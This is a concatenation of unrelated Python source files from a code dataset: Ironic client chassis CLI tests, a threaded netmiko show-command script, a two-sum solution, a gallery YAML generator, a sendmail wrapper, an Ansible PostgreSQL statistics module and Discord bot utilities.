has been successfully deleted\n \"\"\"\n self.delete_chassis(self.chassis['uuid'])\n chassis_list_uuid = self.get_chassis_uuids_from_chassis_list()\n\n self.assertNotIn(self.chassis['uuid'], chassis_list_uuid)\n\n def test_chassis_show(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) check that chassis-show returns the same chassis UUID\n 3) chassis-create\n \"\"\"\n chassis_show = self.show_chassis(self.chassis['uuid'])\n self.assertEqual(self.chassis['uuid'], chassis_show['uuid'])\n\n def test_chassis_show_field(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) show chassis with fields uuid\n 3) check that fields is exist\n \"\"\"\n fields = ['uuid']\n chassis_show = self.show_chassis(self.chassis['uuid'],\n params='--fields {0}'\n .format(*fields))\n self.assertTableHeaders(fields, chassis_show.keys())\n\n def test_chassis_update(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) update chassis\n 3) check that chassis has been successfully updated\n \"\"\"\n updated_chassis = self.update_chassis(\n 
self.chassis['uuid'], 'add', 'description=test-chassis')\n self.assertEqual('test-chassis', updated_chassis['description'])\n self.assertNotEqual(self.chassis['description'],\n updated_chassis['description'])\n\n def test_chassis_node_list(self):\n \"\"\"Test steps:\n\n 1) create chassis in setUp()\n 2) create 3 nodes\n 3) update 2 nodes to be included in chassis\n 4) check if 2 nodes are added to chassis\n 5) check if 1 nodes isn't added to chassis\n \"\"\"\n node1 = self.create_node()\n node2 = self.create_node()\n\n # This node is created to show that it won't be present\n # in the chassis-node-list output\n\n node3 = self.create_node()\n updated_node1 = self.update_node(node1['uuid'],\n 'add chassis_uuid={0}'\n .format(self.chassis['uuid']))\n updated_node2 = self.update_node(node2['uuid'],\n 'add chassis_uuid={0}'\n .format(self.chassis['uuid']))\n nodes = [updated_node1['uuid'], updated_node2['uuid']]\n nodes.sort()\n nodes_uuids = self.get_nodes_uuids_from_chassis_node_list(\n self.chassis['uuid'])\n nodes_uuids.sort()\n self.assertEqual(nodes, nodes_uuids)\n self.assertNotIn(node3['uuid'], nodes_uuids)\n\n\nclass ChassisNegativeTestsIronicClient(base.FunctionalTestBase):\n \"\"\"Negative tests for testing actions with Chassis.\n\n Negative tests for the Ironic CLI commands which checks actions with\n chassis command like show, update, delete either using with arguments\n or without arguments.\n \"\"\"\n\n def test_chassis_delete_without_arguments(self):\n \"\"\"Test step:\n\n 1) check that chassis-delete command without arguments\n triggers an exception\n \"\"\"\n ex_text = r'chassis-delete: error: too few arguments'\n\n six.assertRaisesRegex(self, exceptions.CommandFailed,\n ex_text,\n self.delete_chassis, '')\n\n def test_chassis_delete_with_incorrect_chassis_uuid(self):\n \"\"\"Test step:\n\n 1) check that deleting non-exist chassis triggers an exception\n triggers an exception\n \"\"\"\n uuid = data_utils.rand_uuid()\n ex_text = (r\"Chassis {0} \"\n r\"could not be found. \\(HTTP 404\\)\".format(uuid))\n\n six.assertRaisesRegex(self, exceptions.CommandFailed,\n ex_text,\n self.delete_chassis,\n '{0}'.format(uuid))\n\n def test_chassis_show_without_arguments(self):\n \"\"\"Test step:\n\n 1) check that chassis-show command without arguments\n triggers an exception\n \"\"\"\n ex_text = r'chassis-show: error: too few arguments'\n\n six.assertRaisesRegex(self, exceptions.CommandFailed,\n ex_text,\n self.show_chassis, '')\n\n def test_chassis_show_with_incorrect_chassis_uuid(self):\n \"\"\"Test step:\n\n 1) check that chassis-show command with incorrect chassis\n uuid triggers an exception\n \"\"\"\n uuid = data_utils.rand_uuid()\n ex_text = (r\"Chassis {0} \"\n r\"could not be found. 
\\(HTTP 404\\)\".format(uuid))\n\n        six.assertRaisesRegex(self, exceptions.CommandFailed,\n                              ex_text,\n                              self.show_chassis,\n                              '{0}'.format(uuid))\n\n    def test_chassis_update_without_arguments(self):\n        \"\"\"Test steps:\n\n        1) create chassis\n        2) check that chassis-update command without arguments\n        triggers an exception\n        \"\"\"\n        ex_text = r'chassis-update: error: too few arguments'\n\n        six.assertRaisesRegex(self, exceptions.CommandFailed,\n                              ex_text,\n                              self.update_chassis,\n                              chassis_id='',\n                              operation='')\n\n    def test_chassis_update_with_incorrect_chassis_uuid(self):\n        \"\"\"Test steps:\n\n        1) create chassis\n        2) check that chassis-update command with incorrect arguments\n        triggers an exception\n        \"\"\"\n        uuid = data_utils.rand_uuid()\n        ex_text = r'chassis-update: error: too few arguments'\n\n        six.assertRaisesRegex(self,\n                              exceptions.CommandFailed,\n                              ex_text,\n                              self.update_chassis,\n                              chassis_id='{0}'.format(uuid),\n                              operation='')\n","sub_path":"ironicclient/tests/functional/test_chassis.py","file_name":"test_chassis.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"617207063","text":"from pprint import pprint\nfrom datetime import datetime\nimport logging\nimport yaml\nimport time\nimport re\nfrom itertools import repeat\nfrom netmiko import (\n    ConnectHandler,\n    NetmikoTimeoutException,\n    NetmikoAuthenticationException,\n)\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport random\n\n\nlogging.getLogger(\"paramiko\").setLevel(logging.WARNING)\nlogging.getLogger(\"netmiko\").setLevel(logging.WARNING)\n\nlogging.basicConfig(\n    format='%(threadName)s %(name)s %(levelname)s: %(message)s',\n    level=logging.INFO)\n\n\ndef send_show_command(device, show):\n    start_msg = \"===> {} Connection: {}\"\n    received_msg = \"<=== {} Received: {}\"\n    ip = device[\"host\"]\n    logging.info(start_msg.format(datetime.now().time(), ip))\n\n    try:\n        with ConnectHandler(**device) as ssh:\n            time.sleep(random.random()*10)\n            ssh.enable()\n            result = ssh.send_command(show)\n            logging.info(received_msg.format(datetime.now().time(), ip))\n            return ip, result\n    except (NetmikoTimeoutException, NetmikoAuthenticationException) as error:\n        logging.warning(error)\n\n\ndef send_command_to_devices(devices, command, parse_command_func):\n    result_dict = {}\n    with ThreadPoolExecutor(max_workers=3) as executor:\n        future_list = []\n        for device in devices:\n            f = executor.submit(\n                send_show_command, device, show=command\n            )\n            future_list.append(f)\n        for future in as_completed(future_list):\n            ip, out = future.result()\n            result_dict[ip] = parse_command_func(out)\n    return result_dict\n\n\ndef parse_sh_ip_int_br(output):\n    regex = r\"(\\S+) +([\\d.]+) +\"\n    intf_ip_dict = {}\n    for match in re.finditer(regex, output):\n        intf, ip = match.groups()\n        intf_ip_dict[intf] = ip\n    return intf_ip_dict\n\n\nif __name__ == \"__main__\":\n    with open(\"devices.yaml\") as f:\n        devices = yaml.safe_load(f)\n    result_dict = send_command_to_devices(\n        devices, \"sh ip int br\", parse_sh_ip_int_br\n    )\n    pprint(result_dict)\n","sub_path":"examples/20_concurrent_connections/netmiko_threads_submit_and_parse.py","file_name":"netmiko_threads_submit_and_parse.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"545780350","text":"class Solution():\n    def twoSum(self, nums, target):\n        seen = {}\n        for i, v in enumerate(nums):\n            remaining = target - v\n            if 
remaining in seen:\n                return [seen[remaining], i]\n            else:\n                seen[v] = i\n        return []\n\nif __name__ == \"__main__\":\n    a = [4, 5, 7, 6, 2, 9]\n    solution = Solution()\n    s = []\n    s.append(solution.twoSum(a,11))\n    print(s)\n\n# extension: how would you change this to return every pair that matches the target?","sub_path":"LeetCode/0001. Two Sum.py","file_name":"0001. Two Sum.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"393943708","text":"from os import listdir\nimport sys\n\nyml_file = '_data/gallery.yml'\ncut_off = open(yml_file, 'w')\nappend = open(yml_file, 'a')\ncount = 0\nfor f in listdir('gallery/'):\n\tif count == 0:\n\t\tif f != '.DS_Store':\n\t\t\tcut_off.write('- name: ' + f + '\\n')\n\t\t\tcount += 1\n\telse:\n\t\tappend.write('- name: ' + f + '\\n')","sub_path":"imgnames.py","file_name":"imgnames.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"257409579","text":"#!/usr/local/bin/python\n\n# sendmail.py\n#\n# a simple interface for injecting mail to the local mail delivery\n# agent\n#\n\nimport os,string,re\nimport MaildirQueue\nimport log\n\nDISABLED=0\n\ndef delayed_queue(BOUNCE_RETURN_ADDRESS, TO_ADDRESS_LIST, BODY):\n    mq = MaildirQueue.MaildirQueue(\"/neo/data/queue\")\n    fn = mq.tmpfile()\n    fp = open(fn, \"w\")\n    fp.write(\"%s\\n-##SEP##-\\n\" % BOUNCE_RETURN_ADDRESS)\n    fp.write(\"%s\\n-##SEP##-\\n\" % string.join(TO_ADDRESS_LIST, \"\\n\"))\n    fp.write(BODY)\n    fp.close()\n    mq.enqueue(fn, \"new\")\n\nVALID_CHARS = string.ascii_letters + string.digits + \"@.+-_,:\"\nVALID_CHARS_RE = \"([^-@\\+\\._,:A-Za-z0-9])\"\n\ndef shell_escape(s):\n    global VALID_CHARS, VALID_CHARS_RE\n    # This should work.. 
but it doesn't\n    #invalid_re = re.compile(VALID_CHARS_RE)\n    #return invalid_re.sub(r'\\\\1', s)\n\n    o = []\n    for x in range(len(s)):\n        if s[x] not in VALID_CHARS:\n            o.append(\"\\\\%s\" % s[x])\n        else:\n            o.append(s[x])\n    return ''.join(o)\n\n\ndef sendmail(BOUNCE_RETURN_ADDRESS,TO_ADDRESS_LIST,BODY):\n    global DISABLED\n    if DISABLED:\n        log (\"Not sending to %s\" % repr(TO_ADDRESS_LIST))\n        return\n    try:\n        mod_to_list = []\n        for address in TO_ADDRESS_LIST:\n            mod_to_list.append(shell_escape(address))\n        \n        cmd = \"/usr/lib/sendmail -oi -f'%s' -- %s\" % (BOUNCE_RETURN_ADDRESS,\n                                                      string.join(mod_to_list, ' '))\n        fp = os.popen(cmd, \"w\", 16384)\n        fp.write(BODY)\n        r = fp.close()\n        if not r: return\n        if os.WIFEXITED(r):\n            if os.WEXITSTATUS(r):\n                raise RuntimeError(\"cmd '%s' returned %d\" % (cmd, os.WEXITSTATUS(r)))\n        elif os.WIFSIGNALED(r):\n            raise RuntimeError(\"cmd '%s' ended on signal %d\" % (cmd, os.WTERMSIG(r)))\n        elif os.WIFSTOPPED(r):\n            raise RuntimeError(\"cmd '%s' stopped on signal %d\" % (cmd, os.WSTOPSIG(r)))\n    except IOError:\n        delayed_queue(BOUNCE_RETURN_ADDRESS, TO_ADDRESS_LIST, BODY)\n    except:\n        import handle_error\n        handle_error.handleException(\"Unable to send message\")\n        delayed_queue(BOUNCE_RETURN_ADDRESS, TO_ADDRESS_LIST, BODY)\n","sub_path":"pysrc/base/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"569256586","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2020, Andrew Klychkov (@Andersson007) \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nDOCUMENTATION = r'''\n---\nmodule: postgresql_user_obj_stat_info\nshort_description: Gather statistics about PostgreSQL user objects\ndescription:\n- Gathers statistics about PostgreSQL user objects.\nversion_added: '0.2.0'\noptions:\n  filter:\n    description:\n    - Limit the collected information by comma separated string or YAML list.\n    - Allowable values are C(functions), C(indexes), C(tables).\n    - By default, collects all subsets.\n    - Unsupported values are ignored.\n    type: list\n    elements: str\n  schema:\n    description:\n    - Restrict the output by certain schema.\n    type: str\n  db:\n    description:\n    - Name of database to connect.\n    type: str\n    aliases:\n    - login_db\n  session_role:\n    description:\n    - Switch to session_role after connecting. 
The specified session_role must\n be a role that the current login_user is a member of.\n - Permissions checking for SQL commands is carried out as though\n the session_role were the one that had logged in originally.\n type: str\n trust_input:\n description:\n - If C(no), check the value of I(session_role) is potentially dangerous.\n - It makes sense to use C(no) only when SQL injections via I(session_role) are possible.\n type: bool\n default: yes\n version_added: '0.2.0'\n\nnotes:\n- C(size) and C(total_size) returned values are presented in bytes.\n- For tracking function statistics the PostgreSQL C(track_functions) parameter must be enabled.\n See U(https://www.postgresql.org/docs/current/runtime-config-statistics.html) for more information.\n- Supports C(check_mode).\nseealso:\n- module: community.postgresql.postgresql_info\n- module: community.postgresql.postgresql_ping\n- name: PostgreSQL statistics collector reference\n description: Complete reference of the PostgreSQL statistics collector documentation.\n link: https://www.postgresql.org/docs/current/monitoring-stats.html\nauthor:\n- Andrew Klychkov (@Andersson007)\n- Thomas O'Donnell (@andytom)\nextends_documentation_fragment:\n- community.postgresql.postgres\n\n'''\n\nEXAMPLES = r'''\n- name: Collect information about all supported user objects of the acme database\n community.postgresql.postgresql_user_obj_stat_info:\n db: acme\n\n- name: Collect information about all supported user objects in the custom schema of the acme database\n community.postgresql.postgresql_user_obj_stat_info:\n db: acme\n schema: custom\n\n- name: Collect information about user tables and indexes in the acme database\n community.postgresql.postgresql_user_obj_stat_info:\n db: acme\n filter: tables, indexes\n'''\n\nRETURN = r'''\nindexes:\n description: User index statistics.\n returned: always\n type: dict\n sample: {\"public\": {\"test_id_idx\": {\"idx_scan\": 0, \"idx_tup_fetch\": 0, \"idx_tup_read\": 0, \"relname\": \"test\", \"size\": 8192, ...}}}\ntables:\n description: User table statistics.\n returned: always\n type: dict\n sample: {\"public\": {\"test\": {\"analyze_count\": 3, \"n_dead_tup\": 0, \"n_live_tup\": 0, \"seq_scan\": 2, \"size\": 0, \"total_size\": 8192, ...}}}\nfunctions:\n description: User function statistics.\n returned: always\n type: dict\n sample: {\"public\": {\"inc\": {\"calls\": 1, \"funcid\": 26722, \"self_time\": 0.23, \"total_time\": 0.23}}}\n'''\n\ntry:\n from psycopg2.extras import DictCursor\nexcept ImportError:\n # psycopg2 is checked by connect_to_db()\n # from ansible.module_utils.postgres\n pass\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.community.postgresql.plugins.module_utils.database import (\n check_input,\n)\nfrom ansible_collections.community.postgresql.plugins.module_utils.postgres import (\n connect_to_db,\n exec_sql,\n get_conn_params,\n postgres_common_argument_spec,\n)\nfrom ansible.module_utils.six import iteritems\n\n\n# ===========================================\n# PostgreSQL module specific support methods.\n#\n\n\nclass PgUserObjStatInfo():\n \"\"\"Class to collect information about PostgreSQL user objects.\n\n Args:\n module (AnsibleModule): Object of AnsibleModule class.\n cursor (cursor): Cursor object of psycopg2 library to work with PostgreSQL.\n\n Attributes:\n module (AnsibleModule): Object of AnsibleModule class.\n cursor (cursor): Cursor object of psycopg2 library to work with PostgreSQL.\n executed_queries (list): List of executed queries.\n info 
(dict): Statistics dictionary.\n obj_func_mapping (dict): Mapping of object types to corresponding functions.\n schema (str): Name of a schema to restrict stat collecting.\n \"\"\"\n\n def __init__(self, module, cursor):\n self.module = module\n self.cursor = cursor\n self.info = {\n 'functions': {},\n 'indexes': {},\n 'tables': {},\n }\n self.obj_func_mapping = {\n 'functions': self.get_func_stat,\n 'indexes': self.get_idx_stat,\n 'tables': self.get_tbl_stat,\n }\n self.schema = None\n\n def collect(self, filter_=None, schema=None):\n \"\"\"Collect statistics information of user objects.\n\n Kwargs:\n filter_ (list): List of subsets which need to be collected.\n schema (str): Restrict stat collecting by certain schema.\n\n Returns:\n ``self.info``.\n \"\"\"\n if schema:\n self.set_schema(schema)\n\n if filter_:\n for obj_type in filter_:\n obj_type = obj_type.strip()\n obj_func = self.obj_func_mapping.get(obj_type)\n\n if obj_func is not None:\n obj_func()\n else:\n self.module.warn(\"Unknown filter option '%s'\" % obj_type)\n\n else:\n for obj_func in self.obj_func_mapping.values():\n obj_func()\n\n return self.info\n\n def get_func_stat(self):\n \"\"\"Get function statistics and fill out self.info dictionary.\"\"\"\n query = \"SELECT * FROM pg_stat_user_functions\"\n if self.schema:\n query = \"SELECT * FROM pg_stat_user_functions WHERE schemaname = %s\"\n\n result = exec_sql(self, query, query_params=(self.schema,),\n add_to_executed=False)\n\n if not result:\n return\n\n self.__fill_out_info(result,\n info_key='functions',\n schema_key='schemaname',\n name_key='funcname')\n\n def get_idx_stat(self):\n \"\"\"Get index statistics and fill out self.info dictionary.\"\"\"\n query = \"SELECT * FROM pg_stat_user_indexes\"\n if self.schema:\n query = \"SELECT * FROM pg_stat_user_indexes WHERE schemaname = %s\"\n\n result = exec_sql(self, query, query_params=(self.schema,),\n add_to_executed=False)\n\n if not result:\n return\n\n self.__fill_out_info(result,\n info_key='indexes',\n schema_key='schemaname',\n name_key='indexrelname')\n\n def get_tbl_stat(self):\n \"\"\"Get table statistics and fill out self.info dictionary.\"\"\"\n query = \"SELECT * FROM pg_stat_user_tables\"\n if self.schema:\n query = \"SELECT * FROM pg_stat_user_tables WHERE schemaname = %s\"\n\n result = exec_sql(self, query, query_params=(self.schema,),\n add_to_executed=False)\n\n if not result:\n return\n\n self.__fill_out_info(result,\n info_key='tables',\n schema_key='schemaname',\n name_key='relname')\n\n def __fill_out_info(self, result, info_key=None, schema_key=None, name_key=None):\n # Convert result to list of dicts to handle it easier:\n result = [dict(row) for row in result]\n\n for elem in result:\n # Add schema name as a key if not presented:\n if not self.info[info_key].get(elem[schema_key]):\n self.info[info_key][elem[schema_key]] = {}\n\n # Add object name key as a subkey\n # (they must be uniq over a schema, so no need additional checks):\n self.info[info_key][elem[schema_key]][elem[name_key]] = {}\n\n # Add other other attributes to a certain index:\n for key, val in iteritems(elem):\n if key not in (schema_key, name_key):\n self.info[info_key][elem[schema_key]][elem[name_key]][key] = val\n\n if info_key in ('tables', 'indexes'):\n schemaname = elem[schema_key]\n if self.schema:\n schemaname = self.schema\n\n relname = '%s.%s' % (schemaname, elem[name_key])\n\n result = exec_sql(self, \"SELECT pg_relation_size (%s)\",\n query_params=(relname,),\n add_to_executed=False)\n\n 
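# Note: pg_relation_size reports only the relation's main data fork, while\n                # pg_total_relation_size (used for tables below) also counts indexes and TOAST.\n                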
self.info[info_key][elem[schema_key]][elem[name_key]]['size'] = size_result[0][0]\n\n if info_key == 'tables':\n total_size_result = exec_sql(self, \"SELECT pg_total_relation_size (%s)\",\n query_params=(relname,),\n add_to_executed=False)\n\n self.info[info_key][elem[schema_key]][elem[name_key]]['total_size'] = total_size_result[0][0]\n\n def set_schema(self, schema):\n \"\"\"If schema exists, set self.schema, otherwise fail.\"\"\"\n query = (\"SELECT 1 FROM information_schema.schemata \"\n \"WHERE schema_name = %s\")\n result = exec_sql(self, query, query_params=(schema,),\n add_to_executed=False)\n\n if result and result[0][0]:\n self.schema = schema\n else:\n self.module.fail_json(msg=\"Schema '%s' does not exist\" % schema)\n\n\n# ===========================================\n# Module execution.\n#\n\ndef main():\n argument_spec = postgres_common_argument_spec()\n argument_spec.update(\n db=dict(type='str', aliases=['login_db']),\n filter=dict(type='list', elements='str'),\n session_role=dict(type='str'),\n schema=dict(type='str'),\n trust_input=dict(type=\"bool\", default=True),\n )\n module = AnsibleModule(\n argument_spec=argument_spec,\n supports_check_mode=True,\n )\n\n filter_ = module.params[\"filter\"]\n schema = module.params[\"schema\"]\n\n if not module.params[\"trust_input\"]:\n check_input(module, module.params['session_role'])\n\n # Connect to DB and make cursor object:\n pg_conn_params = get_conn_params(module, module.params)\n # The module only reads statistics, so there is nothing to commit;\n # keep autocommit disabled:\n db_connection = connect_to_db(module, pg_conn_params, autocommit=False)\n cursor = db_connection.cursor(cursor_factory=DictCursor)\n\n ############################\n # Create object and do work:\n pg_obj_info = PgUserObjStatInfo(module, cursor)\n\n info_dict = pg_obj_info.collect(filter_, schema)\n\n # Clean up:\n cursor.close()\n db_connection.close()\n\n # Return information:\n module.exit_json(**info_dict)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/postgresql/plugins/modules/postgresql_user_obj_stat_info.py","file_name":"postgresql_user_obj_stat_info.py","file_ext":"py","file_size_in_byte":11424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"11426067","text":"import discord\nimport logging\nfrom datetime import datetime\n\n\ndef dateformat(dtime=None):\n \"\"\"Formats a date.\n\n Args:\n dtime: The datetime. 
If None, this will be the current time.\n\n Returns:\n The formatted timestamp string.\n \"\"\"\n if dtime is None:\n dtime = datetime.now()\n return dtime.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef init_logging():\n \"\"\"Configures the discord logger to write INFO logs to discord.log.\"\"\"\n logger = logging.getLogger(\"discord\")\n logger.setLevel(logging.INFO)\n handler = logging.FileHandler(filename=\"discord.log\", encoding=\"utf-8\",\n mode=\"w\")\n formatter = logging.Formatter(\"[%(asctime)s:%(levelname)s] %(message)s\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n\ndef log(msg):\n \"\"\"Logs a message to the discord logger and stdout.\n\n Args:\n msg: The message.\n \"\"\"\n logger = logging.getLogger(\"discord\")\n logger.info(msg)\n print(msg)\n\n\ndef create_embed(title, text, color, data=None):\n \"\"\"Creates an embed.\n\n Args:\n title: The title for the embed.\n text: The text for the embed.\n color: The color of the embed.\n data: Data entries for the embed.\n\n Returns:\n The created embed.\n \"\"\"\n if data is None:\n data = {}\n embed = discord.Embed(title=title, description=text, color=color)\n for key in data:\n embed.add_field(name=key, value=data[key])\n return embed\n","sub_path":"misc/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
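For context on the two records above, here are two brief usage sketches. Neither is part of the original dataset; the row contents, file names, command strings, and values are illustrative assumptions.

First, a minimal sketch of the nested schema -> object -> attributes mapping that PgUserObjStatInfo.collect() builds in __fill_out_info(), using hand-written rows in place of a live pg_stat_user_tables result:

# stats_shape_sketch.py - mirrors the nesting logic of the Ansible module above;
# the rows are made up for illustration, not real statistics.
rows = [
    {"schemaname": "public", "relname": "test", "seq_scan": 2, "n_live_tup": 0},
]

info = {"tables": {}}
for elem in rows:
    schema = elem["schemaname"]
    # Add the schema key if not present yet:
    info["tables"].setdefault(schema, {})
    # Keep everything except the two key columns as the object's attributes:
    info["tables"][schema][elem["relname"]] = {
        k: v for k, v in elem.items() if k not in ("schemaname", "relname")
    }

print(info)  # {'tables': {'public': {'test': {'seq_scan': 2, 'n_live_tup': 0}}}}

Second, a sketch of how the helpers in misc/util.py might be wired into a discord.py client. The event names and Client/Intents setup are standard discord.py API; the command string, color, and field names are assumptions:

# util_usage_sketch.py - hypothetical bot wiring for the helpers above.
import discord

from misc.util import create_embed, dateformat, init_logging, log

intents = discord.Intents.default()
intents.message_content = True  # required on discord.py 2.x to read message text
client = discord.Client(intents=intents)

@client.event
async def on_ready():
    init_logging()
    log("Logged in as %s at %s" % (client.user, dateformat()))

@client.event
async def on_message(message):
    if message.content.startswith("!status"):
        embed = create_embed(
            title="Status",
            text="All systems nominal.",
            color=0x2ECC71,
            data={"Checked at": dateformat()},
        )
        await message.channel.send(embed=embed)

# client.run("YOUR_TOKEN")  # token deliberately left as a placeholder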